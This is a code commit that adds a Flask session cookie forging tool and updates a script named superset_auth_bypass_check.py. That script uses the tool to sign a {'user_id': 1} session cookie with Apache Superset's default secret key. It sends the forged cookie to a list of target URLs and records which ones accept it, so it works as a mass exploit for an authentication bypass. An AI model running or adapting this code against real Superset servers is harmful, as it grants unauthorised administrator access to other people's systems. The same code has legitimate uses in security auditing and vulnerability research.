Add files via upload

flask_session_cookie_manager3.py

@@ -0,0 +1,159 @@
+""" Flask Session Cookie Decoder/Encoder """
+__author__ = 'Wilson Sumanang, Alexandre ZANNI'
+
+# standard imports
+import sys
+import zlib
+from itsdangerous import base64_decode
+import ast
+
+# Abstract Base Classes (PEP 3119)
+if sys.version_info[0] < 3: # < 3.0
+    raise Exception('Must be using at least Python 3')
+elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
+    from abc import ABCMeta, abstractmethod
+else: # > 3.4
+    from abc import ABC, abstractmethod
+
+# Lib for argument parsing
+import argparse
+
+# external Imports
+from flask.sessions import SecureCookieSessionInterface
+
+class MockApp(object):
+
+    def __init__(self, secret_key):
+        self.secret_key = secret_key
+
+
+if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
+    class FSCM(metaclass=ABCMeta):
+        def encode(secret_key, session_cookie_structure):
+            """ Encode a Flask session cookie """
+            try:
+                app = MockApp(secret_key)
+
+                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
+                si = SecureCookieSessionInterface()
+                s = si.get_signing_serializer(app)
+
+                return s.dumps(session_cookie_structure)
+            except Exception as e:
+                return "[Encoding error] {}".format(e)
+                raise e
+
+
+        def decode(session_cookie_value, secret_key=None):
+            """ Decode a Flask cookie  """
+            try:
+                if(secret_key==None):
+                    compressed = False
+                    payload = session_cookie_value
+
+                    if payload.startswith('.'):
+                        compressed = True
+                        payload = payload[1:]
+
+                    data = payload.split(".")[0]
+
+                    data = base64_decode(data)
+                    if compressed:
+                        data = zlib.decompress(data)
+
+                    return data
+                else:
+                    app = MockApp(secret_key)
+
+                    si = SecureCookieSessionInterface()
+                    s = si.get_signing_serializer(app)
+
+                    return s.loads(session_cookie_value)
+            except Exception as e:
+                return "[Decoding error] {}".format(e)
+                raise e
+else: # > 3.4
+    class FSCM(ABC):
+        def encode(secret_key, session_cookie_structure):
+            """ Encode a Flask session cookie """
+            try:
+                app = MockApp(secret_key)
+
+                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
+                si = SecureCookieSessionInterface()
+                s = si.get_signing_serializer(app)
+
+                return s.dumps(session_cookie_structure)
+            except Exception as e:
+                return "[Encoding error] {}".format(e)
+                raise e
+
+
+        def decode(session_cookie_value, secret_key=None):
+            """ Decode a Flask cookie  """
+            try:
+                if(secret_key==None):
+                    compressed = False
+                    payload = session_cookie_value
+
+                    if payload.startswith('.'):
+                        compressed = True
+                        payload = payload[1:]
+
+                    data = payload.split(".")[0]
+
+                    data = base64_decode(data)
+                    if compressed:
+                        data = zlib.decompress(data)
+
+                    return data
+                else:
+                    app = MockApp(secret_key)
+
+                    si = SecureCookieSessionInterface()
+                    s = si.get_signing_serializer(app)
+
+                    return s.loads(session_cookie_value)
+            except Exception as e:
+                return "[Decoding error] {}".format(e)
+                raise e
+
+
+if __name__ == "__main__":
+    # Args are only relevant for __main__ usage
+    
+    ## Description for help
+    parser = argparse.ArgumentParser(
+                description='Flask Session Cookie Decoder/Encoder',
+                epilog="Author : Wilson Sumanang, Alexandre ZANNI")
+
+    ## prepare sub commands
+    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
+
+    ## create the parser for the encode command
+    parser_encode = subparsers.add_parser('encode', help='encode')
+    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
+                                help='Secret key', required=True)
+    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
+                                help='Session cookie structure', required=True)
+
+    ## create the parser for the decode command
+    parser_decode = subparsers.add_parser('decode', help='decode')
+    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
+                                help='Secret key', required=False)
+    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
+                                help='Session cookie value', required=True)
+
+    ## get args
+    args = parser.parse_args()
+
+    ## find the option chosen
+    if(args.subcommand == 'encode'):
+        if(args.secret_key is not None and args.cookie_structure is not None):
+            print(FSCM.encode(args.secret_key, args.cookie_structure))
+    elif(args.subcommand == 'decode'):
+        if(args.secret_key is not None and args.cookie_value is not None):
+            print(FSCM.decode(args.cookie_value,args.secret_key))
+        elif(args.cookie_value is not None):
+            print(FSCM.decode(args.cookie_value))
+

superset_auth_bypass_check.py

@@ -5,15 +5,20 @@ import requests
 import sys
 import re
 import threading
+import subprocess
 from requests.exceptions import RequestException
 from urllib3.exceptions import InsecureRequestWarning
 
+command = ['python3', 'flask_session_cookie_manager3.py', 'encode', '-s', 'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', '-t', "{'user_id': 1}"]
+session = subprocess.run(command, capture_output=True, text=True)
+sessionout = session.stdout.strip()
+
 # 自定义请求头字段
 headers = {
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
     "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
-    "Cookie": "session=eyJ1c2VyX2lkIjoxfQ.ZEnvAw.psuAEJtVOeGlEgnJGqKLKSLE5WE"
+    "Cookie": "session="+sessionout
 }
 
 vulurl=[]
@@ -45,7 +50,7 @@ def urltest(url):
 #漏洞检测
 def vultest(url):
     try:
-        response = requests.get(url, headers=headers, verify=False , timeout=3)
+        response = requests.get(url, headers=headers, verify=False , timeout=3, allow_redirects=False)
         parsed_url = urlsplit(url)
         url=parsed_url.scheme+"://"+parsed_url.netloc
         # 检查响应头的状态码是否为200